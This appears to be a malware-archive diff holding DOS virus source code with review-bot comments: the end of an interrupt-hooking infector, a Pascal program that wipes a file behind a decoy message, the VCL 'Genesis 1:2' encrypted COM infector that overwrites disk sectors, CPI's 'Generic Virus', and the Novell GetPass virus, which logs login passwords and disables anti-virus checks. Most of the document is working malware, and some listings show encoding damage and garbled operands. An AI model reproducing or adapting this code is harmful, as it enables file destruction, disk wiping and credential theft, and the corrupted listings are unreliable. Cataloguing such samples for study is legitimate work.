jbe Below12 ; Yes? Then JMP.
sub bl, 12 ; Reset Counter
Below12:
retn
CheckCounter endp
loc_0_648:
pop ax
retn
DoInfection proc near
mov dx, offset NewInt24
mov ax, 2524h
int 21h ; Set New Int 24h Vectors
cmp FileType, 'C' ; COM File?
jnz DoInfectEXE ; No? Then JMP.
call InfectCOM
jmp short InfectedFile
nop
DoInfectEXE:
call InfectEXE
InfectedFile:
push ds
mov dx, Int24Ofs
mov ax, Int24Seg
mov ds, ax
mov ax, 2524h
int 21h ; Restore Int 24h
pop ds
retn
DoInfection endp
NewInt24:
mov al, 3
iret
FillWithSpace proc near
mov dx, offset NewInt1C
mov ax, 251Ch
int 21h ; Set New Int 1Ch
mov byte ptr NewInt1C, 90h
nop
mov ax, 0B800h
mov es, ax ; ES points to Video Memory
assume es:nothing
mov di, 0FA0h
mov ax, 720h
mov cx, 11
repne stosw
push cs
pop es ; ES = CS
assume es:seg000
retn
FillWithSpace endp
db 0 ;
db 0 ;
byte_0_699 db 0
word_0_69A dw 720h
byte_0_69C db 0Fh, 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh
db 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0F7h, 0Eh
byte_0_6AE db 0EEh
db 0Ch ;
NewInt1C:
nop
sti
push ax
push cx
push dx
push bx
push bp
push si
push di
push ds
push es
push cs
pop ds ; DS = CS
jmp short loc_0_6CA
nop
loc_0_6C0:
pop es
assume es:nothing
pop ds
pop di
pop si
pop bp
pop bx
pop dx
pop cx
pop ax
iret
loc_0_6CA:
mov ax, 0B800h
mov es, ax ; ES points to Video Memory
assume es:nothing
call sub_0_6FD
mov si, offset word_0_69A
mov cx, 22
repne movsb
cmp byte_0_6AE, 0EEh
jz loc_0_6E9
mov byte_0_6AE, 0EEh
jmp short loc_0_6EE
nop
loc_0_6E9:
mov byte_0_6AE, 0F0h
loc_0_6EE:
mov ax, es:[di]
mov ah, 0Eh
mov word_0_69A, ax
mov byte_0_699, 0
jmp short loc_0_6C0
sub_0_6FD proc near
mov di, 0
loc_0_700:
mov si, offset byte_0_69C
push di
mov cx, 18
cld
rep cmpsb
pop di
jz loc_0_718
inc di
inc di
cmp di, 4000
jnz loc_0_700
mov di, 0
loc_0_718:
cmp di, 3998
jnz locret_0_723
mov byte ptr NewInt1C, 0CFh
locret_0_723:
retn
sub_0_6FD endp
FileType db 0 ; E = EXE File C = COM File
; 0 = 1st Generation
InfMarker dw 0A0Ch
seg000 ends
end start
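Review bot: `repne` is used as the prefix on `movsb` and `stosw` at L451, L493, L606, L835, L1156 and L1205, although MOVS/STOS set no flags and the prefix therefore behaves exactly like `rep`; the spelling is almost certainly a disassembler artifact and reads as a termination condition that does not exist. A comment at the first occurrence, `; repne on movsb has no termination test — equivalent to rep`, would spare readers from looking for a compare that is not there. The only string instruction in the file whose prefix is load-bearing is `rep cmpsb` on L1226, whose result is consumed by the `jz` on L1228.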
@@ -0,0 +1,60 @@
PROGRAM GDE; {By änchanter for LAME SysOps}
USES CRT;
VAR Temp : Text;
X : Integer;
Death_File : String;
{--------------------------------------------------------------------------}
PROCEDURE NoParams;
BEGIN;
SOUND(220);
DELAY(200);
NOSOUND;
TEXTCOLOR(RED);
WRITELN('You Forgot Something... ');
WRITELN;
WRITELN(' SYNTAX:');
WRITELN('GDE C:\SHOCK\USERS');
WRITELN;
WRITELN('Run AGAIN....');
WRITELN(' (c) 1990,1991');
HALT;
END;
{--------------------------------------------------------------------------}
PROCEDURE Kill_That_Fucker;
BEGIN;
ASSIGN(TEMP, Death_File);
REWRITE(TEMP);
CLOSE(TEMP);
APPEND(TEMP);
WHILE X <> 5 Do
BEGIN;
WRITELN(TEMP, 'KGB Read The User File');
WRITELN(TEMP, 'KGB Wrote The User File');
X := X + 1;
END;
WRITELN(TEMP, '<BOOM, you are dead>');
WRITELN(TEMP, 'KGB is WATCHING YOU!');
CLOSE(TEMP);
END;
{--------------------------------------------------------------------------}
PROCEDURE INIT;
BEGIN;
IF PARAMCOUNT <> 1 THEN NoParams;
Death_File := PARAMSTR(1);
TEXTCOLOR(BLUE);
WRITELN('READING USER FILE.......');
Kill_That_Fucker;
WRITELN('ERROR, USER FILE CURRUPTED!');
HALT;
END;
{--------------------------------------------------------------------------}
BEGIN;
X := 1;
INIT;
END.
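Review bot: The header comment on L1249 says nothing about what the program does to the path it is given, yet `REWRITE(TEMP)` on L1274 truncates that file to zero length before the `WRITELN` lines on L1279–L1284 replace its contents, while the console messages on L1293 and L1295 describe a read and a corruption error that never occur. A header line stating that the argument file is destroyed and overwritten, and that the on-screen text is a decoy, is the minimum an analyst cataloguing this sample needs. The `CLOSE(TEMP)` on L1275 immediately followed by `APPEND(TEMP)` on L1276 is redundant with the preceding `REWRITE` and could carry a comment so the sequence is not mistaken for an attempt to preserve existing content.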
@@ -0,0 +1,390 @@
; GEN12.ASM -- Genesis 1:2 Virus
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Virucidal Maniac
virus_type equ 0 ; Appending Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
main proc near
db 0E9h,00h,00h ; Near jump (for compatibility)
start: call find_offset ; Like a PUSH IP
find_offset: pop bp ; BP holds old IP
sub bp,offset find_offset ; Adjust for length of host
call encrypt_decrypt ; Decrypt the virus
start_of_code label near
lea si,[bp + buffer] ; SI points to original start
mov di,0100h ; Push 0100h on to stack for
push di ; return to main program
movsw ; Copy the first two bytes
movsb ; Copy the third byte
mov di,bp ; DI points to start of virus
mov bp,sp ; BP points to stack
sub sp,128 ; Allocate 128 bytes on stack
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer on stack
int 021h
call get_dos_version
cmp ax,0005h ; Did the function return 5?
jl strt00 ; If less, do effect
call get_minute
or ax,ax ; Did the function return zero?
je strt00 ; If equal, do effect
call get_year
cmp ax,07C9h ; Did the function return 1993?
je strt00 ; If equal, do effect
jmp end00 ; Otherwise skip over it
strt00: mov ax,0002h ; First argument is 2
mov cx,0007h ; Second argument is 7
cli ; Disable interrupts (no Ctrl-C)
cwd ; Clear DX (start with sector 0)
int 026h ; DOS absolute write interrupt
sti ; Restore interrupts
end00: mov cx,0005h ; Do 5 infections
search_loop: push cx ; Save CX
call search_files ; Find and infect a file
pop cx ; Restore CX
loop search_loop ; Repeat until CX is 0
jmp end01 ; Otherwise skip over it
strt01: lea si,[di + data00] ; SI points to data
mov ah,0Eh ; BIOS display char. function
display_loop: lodsb ; Load the next char. into AL
or al,al ; Is the character a null?
je disp_strnend ; If it is, exit
int 010h ; BIOS video interrupt
jmp short display_loop ; Do the next character
disp_strnend:
end01:
com_end: pop dx ; DX holds original DTA address
mov ah,01Ah ; DOS set DTA function
int 021h
mov sp,bp ; Deallocate local buffer
xor ax,ax ;
mov bx,ax ;
mov cx,ax ;
mov dx,ax ; Empty out the registers
mov si,ax ;
mov di,ax ;
mov bp,ax ;
ret ; Return to original program
main endp
search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,64 ; Allocate 64 bytes on stack
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 64] ; SI points to 64-byte buffer
int 021h
mov ah,03Bh ; DOS change directory function
lea dx,[di + root] ; DX points to root directory
int 021h
call traverse ; Start the traversal
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 64] ; DX points to old directory
int 021h
mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
root db "\",0 ; Root directory
search_files endp
traverse proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first function
mov cx,00010000b ; CX holds search attributes
lea dx,[di + all_files] ; DX points to "*.*"
int 021h
jc leave_traverse ; Leave if no files present
check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
jne another_dir ; If not, try again
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
je another_dir ;If so, keep going
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 98] ; DX points to new directory
int 021h
call traverse ; Recursively call ourself
pushf ; Save the flags
mov ah,03Bh ; DOS change directory function
lea dx,[di + up_dir] ; DX points to parent directory
int 021h
popf ; Restore the flags
jnc done_searching ; If we infected then exit
another_dir: mov ah,04Fh ; DOS find next function
int 021h
jnc check_dir ; If found check the file
leave_traverse:
lea dx,[di + com_mask] ; DX points to "*.COM"
call find_files ; Try to infect a file
done_searching: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
up_dir db "..",0 ; Parent directory name
all_files db "*.*",0 ; Directories to search for
com_mask db "*.COM",0 ; Mask for all .COM files
traverse endp
find_files proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file
done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_files endp
infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov si,bx ; SI points to the DTA
mov byte ptr [di + set_carry],0 ; Assume we'll fail
cmp word ptr [si + 01Ah],(65279 - (finish - start))
jbe size_ok ; If it's small enough continue
jmp infection_done ; Otherwise exit
size_ok: mov ax,03D00h ; DOS open file function, r/o
lea dx,[si + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; BX holds file handle
mov ah,03Fh ; DOS read from file function
mov cx,3 ; CX holds bytes to read (3)
lea dx,[di + buffer] ; DX points to buffer
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
xchg dx,ax ; Faster than a PUSH AX
mov ah,03Eh ; DOS close file function
int 021h
xchg dx,ax ; Faster than a POP AX
sub ax,finish - start + 3 ; Adjust AX for a valid jump
cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet?
je infection_done ; If equal then exit
mov byte ptr [di + set_carry],1 ; Success -- the file is OK
add ax,finish - start ; Re-adjust to make the jump
mov word ptr [di + new_jump + 1],ax ; Construct jump
mov ax,04301h ; DOS set file attrib. function
xor cx,cx ; Clear all attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
mov ax,03D02h ; DOS open file function, r/w
int 021h
xchg bx,ax ; BX holds file handle
mov ah,040h ; DOS write to file function
mov cx,3 ; CX holds bytes to write (3)
lea dx,[di + new_jump] ; DX points to the jump we made
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
push si ; Save SI through call
call encrypt_code ; Write an encrypted copy
pop si ; Restore SI
mov ax,05701h ; DOS set file time function
mov cx,[si + 016h] ; CX holds old file time
mov dx,[si + 018h] ; DX holds old file date
int 021h
mov ah,03Eh ; DOS close file function
int 021h
mov ax,04301h ; DOS set file attrib. function
xor ch,ch ; Clear CH for file attribute
mov cl,[si + 015h] ; CX holds file's old attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed
ret ; Return to caller
set_carry db ? ; Set-carry-on-exit flag
buffer db 090h,0CDh,020h ; Buffer to hold old three bytes
new_jump db 0E9h,?,? ; New jump to virus
infect_file endp
get_dos_version proc near
mov ah,030h ; DOS get DOS version function
int 021h
mov bx,ax ; Save return value in BX
xor bl,bl ; Clear DOS major version in BX
xchg bh,bl ; Place 0 in BH, minor in BL
cbw ; Sign-extend AL into AX
mov cl,100 ; CL holds multiplier
mul cl ; Multiply AL by 100
add ax,bx ; Add back the minor version
ret ; Return to caller
get_dos_version endp
get_minute proc near
mov ah,02Ch ; DOS get time function
int 021h
mov al,cl ; Copy minute into AL
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_minute endp
get_year proc near
mov ah,02Ah ; DOS get date function
int 021h
xchg cx,ax ; Transfer the year into AX
ret ; Return to caller
get_year endp
data00 db "Genesis 1:2",13,10
db " And the earth was without form and void...",13,10
db 13,10
db " Now...So is your hard disk.",13,10
db 13,10
db " -Virucidal Maniac",13,10
vcl_marker db "[VCL]",0 ; VCL creation marker
encrypt_code proc near
push bp ; Save BP
mov bp,di ; Use BP as pointer to code
lea si,[bp + encrypt_decrypt]; SI points to cipher routine
xor ah,ah ; BIOS get time function
int 01Ah
mov word ptr [si + 9],dx ; Low word of timer is new key
xor byte ptr [si + 1],8 ;
xor byte ptr [si + 8],1 ; Change all SIs to DIs
xor word ptr [si + 11],0101h; (and vice-versa)
lea di,[bp + finish] ; Copy routine into heap
mov cx,finish - encrypt_decrypt - 1 ; All but final RET
push si ; Save SI for later
push cx ; Save CX for later
rep movsb ; Copy the bytes
lea si,[bp + write_stuff] ; SI points to write stuff
mov cx,5 ; CX holds length of write
rep movsb ; Copy the bytes
pop cx ; Restore CX
pop si ; Restore SI
inc cx ; Copy the RET also this time
rep movsb ; Copy the routine again
mov ah,040h ; DOS write to file function
lea dx,[bp + start] ; DX points to virus
lea si,[bp + finish] ; SI points to routine
call si ; Encrypt/write/decrypt
mov di,bp ; DI points to virus again
pop bp ; Restore BP
ret ; Return to caller
write_stuff: mov cx,finish - start ; Length of code
int 021h
encrypt_code endp
end_of_code label near
encrypt_decrypt proc near
lea si,[bp + start_of_code] ; SI points to code to decrypt
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
inc si ; Do the next word
inc si ;
loop xor_loop ; Loop until we're through
ret ; Return to caller
encrypt_decrypt endp
finish label near
code ends
end main
@@ -0,0 +1,260 @@
;=============================================================================
;
; C*P*I
;
; CORRUPTED PROGRAMMING INTERNATIONAL
; -----------------------------------
; p r e s e n t s
;
; T H E
; _ _
; (g) GENERIC VIRUS (g)
; ^ ^
;
;
; A GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADDS A BIT OF
; CODE IN AND MAKES EACH A VIRUS. HOWEVER, WHEN IT MODIFIES EXE FILES, IT
; RENAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR ÒPROGRAM TO BIG TO
; FIT IN MEMORYÓ THIS WILL BE REPAIRED IN LATER VERSIONS OF THIS VIRUS.
;
; WHEN IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARBAGE ON
; THE DISK. HAVE PHUN WITH THIS ONE.
;
; ALSO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION FOR THE CODE
; IMMEDIATE ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;| GROUPING.
;
; THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CPI WILL NOT BE
; HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER INTRODUCTION OF
; THIS VIRUS. ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF ILLEGAL OR
; ILLICIT ACTIVITY THROUGH THE RELEASE OF THIS FILE.
;
; DOCTOR DISSECTOR
; CPI ASSOCIATES
;
;=============================================================================
MAIN:
NOP ;| Marker bytes that identify this program
NOP ;| as infected/a virus
NOP ;|
MOV AX,00 ;| Initialize the pointers
MOV ES:[POINTER],AX ;|
MOV ES:[COUNTER],AX ;|
MOV ES:[DISKS B],AL ;|
MOV AH,19 ;| Get the selected drive (dir?)
INT 21 ;|
MOV CS:DRIVE,AL ;| Get current path (save drive)
MOV AH,47 ;| (dir?)
MOV DH,0 ;|
ADD AL,1 ;|
MOV DL,AL ;| (in actual drive)
LEA SI,CS:OLD_PATH ;|
INT 21 ;|
MOV AH,0E ;| Find # of drives
MOV DL,0 ;|
INT 21 ;|
CMP AL,01 ;| (Check if only one drive)
JNZ HUPS3 ;| (If not one drive, go the HUPS3)
MOV AL,06 ;| Set pointer to SEARCH_ORDER +6 (one drive)
HUPS3: MOV AH,0 ;| Execute this if there is more than 1 drive
LEA BX,SEARCH_ORDER ;|
ADD BX,AX ;|
ADD BX,0001 ;|
MOV CS:POINTER,BX ;|
CLC ;|
CHANGE_DISK: ;| Carry is set if no more .COM files are
JNC NO_NAME_CHANGE ;| found. From here, .EXE files will be
MOV AH,17 ;| renamed to .COM (change .EXE to .COM)
LEA DX,CS:MASKE_EXE ;| but will cause the error message ÒProgram
INT 21 ;| to large to fit in memoryÓ when starting
CMP AL,0FF ;| larger infected programs
JNZ NO_NAME_CHANGE ;| (Check if an .EXE is found)
MOV AH,2CH ;| If neither .COM or .EXE files can be found,
INT 21 ;| then random sectors on the disk will be
MOV BX,CS:POINTER ;| overwritten depending on the system time
MOV AL,CS:[BX] ;| in milliseconds. This is the time of the
MOV BX,DX ;| complete ÒinfectionÓ of a storage medium.
MOV CX,2 ;| The virus can find nothing more to infect
MOV DH,0 ;| starts its destruction.
INT 26 ;| (write crap on disk)
NO_NAME_CHANGE: ;| Check if the end of the search order table
MOV BX,CS:POINTER ;| has been reached. If so, end.
DEC BX ;|
MOV CS:POINTER,BX ;|
MOV DL,CS:[BX] ;|
CMP DL,0FF ;|
JNZ HUPS2 ;|
JMP HOPS ;|
HUPS2: ;| Get a new drive from the search order table
MOV AH,0E ;| and select it, beginning with the ROOT dir.
INT 21 ;| (change drive)
MOV AH,3B ;| (change path)
LEA DX,PATH ;|
INT 21 ;|
JMP FIND_FIRST_FILE ;|
FIND_FIRST_SUBDIR: ;| Starting from the root, search for the
MOV AH,17 ;| first subdir. First, (change .exe to .com)
LEA DX,CS:MASKE_EXE ;| convert all .EXE files to .COM in the
INT 21 ;| old directory.
MOV AH,3B ;| (use root directory)
LEA DX,PATH ;|
INT 21 ;|
MOV AH,04E ;| (search for first subdirectory)
MOV CX,00010001B ;| (dir mask)
LEA DX,MASKE_DIR ;|
INT 21 ;|
JC CHANGE_DISK ;|
MOV BX,CS:COUNTER ;|
INC BX ;|
DEC BX ;|
JZ USE_NEXT_SUBDIR ;|
FIND_NEXT_SUBDIR: ;| Search for the next sub-dir, if no more
MOV AH,4FH ;| are found, the (search for next subdir)
INT 21 ;| drive will be changed.
JC CHANGE_DISK ;|
DEC BX ;|
JNZ FIND_NEXT_SUBDIR ;|
USE_NEXT_SUBDIR:
MOV AH,2FH ;| Select found directory. (get dta address)
INT 21 ;|
ADD BX,1CH ;|
MOV ES:[BX],\Ó ;| (address of name in dta)
INC BX ;|
PUSH DS ;|
MOV AX,ES ;|
MOV DS,AX ;|
MOV DX,BX ;|
MOV AH,3B ;| (change path)
INT 21 ;|
POP DS ;|
MOV BX,CS:COUNTER ;|
INC BX ;|
MOV CS:COUNTER,BX ;|
FIND_FIRST_FILE: ;| Find first .COM file in the current dir.
MOV AH,04E ;| If there are none, (Search for first)
MOV CX,00000001B ;| search the next directory. (mask)
LEA DX,MASKE_COM ;|
INT 21 ;|
JC FIND_FIRST_SUBDIR ;|
JMP CHECK_IF_ILL ;|
FIND_NEXT_FILE: ;| If program is ill (infected) then search
MOV AH,4FH ;| for another. (search for next)
INT 21 ;|
JC FIND_FIRST_SUBDIR ;|
CHECK_IF_ILL: ;| Check if already infected by virus.
MOV AH,3D ;| (open channel)
MOV AL,02 ;| (read/write)
MOV DX,9EH ;| (address of name in dta)
INT 21 ;|
MOV BX,AX ;| (save channel)
MOV AH,3FH ;| (read file)
MOV CH,BUFLEN ;|
MOV DX,BUFFER ;| (write in buffer)
INT 21 ;|
MOV AH,3EH ;| (close file)
INT 21 ;|
MOV BX,CS:[BUFFER] ;| (look for three NOPÕs)
CMP BX,9090 ;|
JZ FIND_NEXT_FILE ;|
MOV AH,43 ;| This section by-passes (write enable)
MOV AL,0 ;| the MS/PC DOS Write Protection.
MOV DX,9EH ;| (address of name in dta)
INT 21 ;|
MOV AH,43 ;|
MOV AL,01 ;|
AND CX,11111110B ;|
INT 21 ;|
MOV AH,3D ;| Open file for read/write (open channel)
MOV AL,02 ;| access (read/write)
MOV DX,9EH ;| (address of name in dta)
INT 21 ;|
MOV BX,AX ;| Read date entry of program and (channel)
MOV AH,57 ;| save for future use. (get date)
MOV AL,0 ;|
INT 21 ;|
PUSH CX ;| (save date)
PUSH DX ;|
MOV DX,CS:[CONTA W] ;| The jump located at 0100h (save old jmp)
MOV CS:[JMPBUF],DX ;| the program will be saved for future use.
MOV DX,CS:[BUFFER+1] ;| (save new jump)
LEA CX,CONT-100 ;|
SUB DX,CX ;|
MOV CS:[CONTA],DX ;|
MOV AH,57 ;| The virus now copies itself to (write date)
MOV AL,1 ;| to the start of the file.
POP DX ;|
POP CX ;| (restore date)
INT 21 ;|
MOV AH,3EH ;| (close file)
INT 21 ;|
MOV DX,CS:[JMPBUF] ;| Restore the old jump address. The virus
MOV CS:[CONTA],DX ;| at address ÒCONTAÓ the jump which was at the
;| start of the program. This is done to
HOPS: ;| preserve the executability of the host
NOP ;| program as much as possible. After saving,
CALL USE_OLD ;| it still works with the jump address in the
;| virus. The jump address in the virus differs
;| from the jump address in memory
CONT DB 0E9 ;| Continue with the host program (make jump)
CONTA DW 0 ;|
MOV AH,00 ;|
INT 21 ;|
USE_OLD:
MOV AH,0E ;| Reactivate the selected (use old drive)
MOV DL,CS:DRIVE ;| drive at the start of the program, and
INT 21 ;| reactivate the selected path at the start
MOV AH,3B ;| of the program.(use old drive)
LEA DX,OLD_PATH-1 ;| (get old path and backslash)
INT 21 ;|
RET ;|
SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF
POINTER DW 0000 ;| (pointer f. search order)
COUNTER DW 0000 ;| (counter f. nth. search)
DISKS DB 0 ;| (number of disks)
MASKE_COM DB Ò*.COMÓ,00 ;| (search for com files)
MASKE_DIR DB Ò*Ó,00 ;| (search for dirÕs)
MASKE_EXE DB 0FF,0,0,0,0,0,00111111XB
DB 0,Ó????????EXEÓ,0,0,0,0
DB 0,Ó????????COMÓ,0
MASKE_ALL DB 0FF,0,0,0,0,0,00111111XB
DB 0,Ó???????????Ó,0,0,0,0
DB 0,Ó????????COMÓ,0
BUFFER EQU 0E00 ;| (a safe place)
BUFLEN EQU 208H ;| Length of virus. Modify this accordingly
;| if you modify this source. Be careful
;| for this may change!
JMPBUF EQU BUFFER+BUFLEN ;| (a safe place for jmp)
PATH DB Ò\Ó,0 ;| (first place)
DRIVE DB 0 ;| (actual drive)
BACK_SLASH DB Ò\Ó
OLD_PATH DB 32 DUP (?) ;| (old path)

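Review bot: The string literals in this listing carry encoding damage — `MASKE_COM DB Ò*.COMÓ,00`, `PATH DB Ò\Ó,0`, `MOV ES:[BX],\Ó` and the header's `ÒPROGRAM TO BIG TO FIT IN MEMORYÓ` show curly quotes rendered as `Ò`/`Ó`/`Õ` mojibake, and `MOV ES:[DISKS B],AL` is a mangled operand, so what is being archived is a corrupted transcription rather than the original bytes. The commit imports it as-is with nothing telling a reader that, which will mislead anyone treating the file as a faithful reference sample. I would add a header comment such as `; NOTE (archive): transcription is damaged - curly quotes appear as O-grave/O-acute mojibake in string literals and at least one operand is garbled; reference copy only, not verbatim.` The `POINTER`/`COUNTER` fields are also written through `ES:` in MAIN but read through `CS:` everywhere else; the note should make clear that this is in the source as received, not an archive edit.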
@@ -0,0 +1,785 @@
;=============================================================================
; Please feel free to distribute, but do NOT change and say it's your's!
;=============================================================================
; You are now looking at the source code of the Novell GetPass virus!
; Stop doing so! But if you don't well, ok! The GetPass virus is fairly
; unique in some parts of it's behaviour. It infects *.COM files using
; an infection interrupt routine.(INT D0) It first renames the files
; it infects to a *.TXT file to avoid heuristic alarms of some rule
; based TSR's and then restores the original extention. Some resident
; anti-viral products will be completely disabled in memory and their
; CRC check files will be deleted. The GetPass routine will become
; resident if the virus detects that NETX (Novell NetWare) is loaded
; in memory, hooking INT 16 (keyboard) and INT 21 in memory.
; The GetPass routine activates when LOGIN is executed. The users login
; name and his/her password will be captured and written to a file wich
; will be created in C:\DOS.(the file is MSD.INI) If the file becomes
; approximatly 8Kb, the virus deletes the file. This to avoid a very large
; file in the DOS directory. A new file will be created and the logging
; will continue. Every first day of the month, when an infected program
; is executed the file containing the names/passwords is printed if there
; is a printer available. The virus does not infect COMMAND.COM.
;
; Greetings ,ThE wEiRd GeNiUs
;
; PS: Check your MSD.INI file once in a while!
;-----------------------------------------------------------------------------
; Assemble with TASM 2.0 or higher, Link with TLINK /T
;-----------------------------------------------------------------------------
CODE SEGMENT
ASSUME CS:CODE,DS:CODE,ES:CODE,SS:CODE
CRYPTLEN EQU CHKTIME-CSTART-1;Length to en/decrypt.
VIRLEN EQU BUFFER-VSTART ;Length of virus.
MINLEN EQU 1000 ;Min file length to infect.
MAXLEN EQU 0F230h ;Max " " " "
CR EQU 0Dh ;Return.
LF EQU 0Ah ;Line feed.
TAB EQU 09h ;Tab.
INTRO EQU LBIT-INAME ;
TSRLEN EQU LASTBYT-TSR ;Length of activation TSR.
TSR2LEN EQU NOTENC-INFECT+1;Length of infection Interrupt.
LENGTH EQU VAL_1-CSTART ;Length of encrypted code.
KBUFF EQU KEYBUFF-TSR ;\
KPTR EQU KEYPTR-TSR ;
FN EQU FNAME-TSR ;
LOGINL EQU LOGIN-TSR ;
KFLAG EQU KBFLAG-TSR ; Offsets in activation TSR.
INTOF EQU INT21-TSR ;
INT16L EQU INT16-TSR ;
OLD16L EQU NINT16-TSR ;
NINTOF EQU NINT21-TSR ;
COUCR EQU CCOUNT-TSR ;
PARLEN EQU PARAM-TSR ;/
ORG 0100h
.RADIX 16
;-----------------------------------------------------------------------------
; Infected dummy program. (Only in 1st run)
;-----------------------------------------------------------------------------
START: JMP VSTART ;Jump to virus code.
;-----------------------------------------------------------------------------
; Begin of the virus code.
;-----------------------------------------------------------------------------
VSTART: CALL CHKDOS ;-Confuse anti-viral progs.
CALL CHKTIME ;/
BEGIN: CALL ENCRYP ;Call decryption routine.
;-----------------------------------------------------------------------------
; From here the code will be encrypted.
;-----------------------------------------------------------------------------
CSTART: CALL BEGIN1 ;Same old trick.
CALL RESBEG ;Restore begin.
CALL CHKDRV ;Check drive & DOS version.
CALL SAVEDIR ;Save startup directory.
PUSH ES ;In the next sessions ES is modified.
CALL INT24 ;NoErrorAllowed.
CALL VSAFE ;Vsafe resident?
CALL ACTIVE ;Install password routine.
POP ES ;Restore extra segment.
CALL ENKEY ;Create new CRYPTKEY.
CALL INSTSR2 ;Place infection routine in memory.
CALL DTA ;Store old and give up new DTA addres.
CALL FIND1 ;Determine how many path's are present.
CALL RANDOM ;Random value for directory search.
CALL FIND2 ;Find suitable directory.
CALL CHDRIVE ;If it is on another drive.
CALL GODIR ;Go to the selected directory.
F_FIRST:MOV AH,4Eh ;Search for 1st *.COM
MOV CX,110b ;Look for read only, system & hidden.
LEA DX,[BP+OFFSET SPEC] ;Offset file specification.(*.COM)
INT 21h ;Call DOS.
JNC OPENF ;Exit if no file found.
CALL EXIT1 ;No files found, quit.
OPENF: CALL CHKCOM ;-Is it COMMAND.COM?
CMP CX,00h ;/
JE LETSGO ;Yes, do NOT infect.
CALL CHKINF ;Already infected?
CALL ATTRIB ;Ask & clear file attributes.
CALL RENAME ;Rename to *.TXT file.
MOV AH,4Eh ;Search the name.TXT file.
MOV CX,110b ;Read only, system & hidden.
LEA DX,[BP+OFFSET NEWNAM] ;Offset file specification.(name.TXT)
INT 21h ;Call DOS.
MOV AX,3D02h ;Open file with read and write access.
LEA DX,[BP+OFFSET NEWNAM] ;Offset file specification.(name.TXT)
INT 21h ;Call DOS.
MOV BYTE PTR[BP+OFFSET HANDLE],AL;Save file handle.
CALL STIME ;Save file date & time.
CHECK: MOV AH,3Fh ;Read begin of victim.
MOV CX,3 ;Read Begin.
LEA DX,[BP+OFFSET ORIGNL] ;Into offset original instructions.
INT 21h ;Call DOS.
JC CLOSE ;On error, quit.
REPLACE:CALL BPOINT ;Move file pointer to end of victim.
SUB AX,3 ;Calculate new jump.
MOV WORD PTR[BP+NEWJMP+1],AX;Store new jump value.
MOV AX,4200h ;Move file pointer to begin.
XOR CX,CX ;Zero high nybble.
XOR DX,DX ;Zero low nybble.
INT 21h ;Call DOS.
MOV AH,40h ;Write to file,
MOV CX,3 ;3 Bytes.
LEA DX,[BP+OFFSET NEWJMP] ;Offset new jump value.
INT 21h ;Call DOS.
CALL BPOINT ;Move file pointer to end.
JMP INFEC ;Create encryption key.
LETSGO: MOV AH,4Fh ;Find next.
INT 21h ;Call DOS.
JC EXIT ;On error, quit.
JMP OPENF ;Open new victim.
INFEC: MOV DL,[BP+OFFSET VAL_1] ;Encryption value into DL.
INT 0D0h ;Neat way to infect a file!
CLOSE: CALL RTIME ;Restore File time & date.
MOV AH,3Eh ;Close file.
INT 21h ;Call DOS.
CALL RENAME2 ;Restore back to COM file.
CALL RATTRIB ;Restore File attributes.
;-----------------------------------------------------------------------------
EXIT: CALL DELSTUF ;Delete CRC checkers.
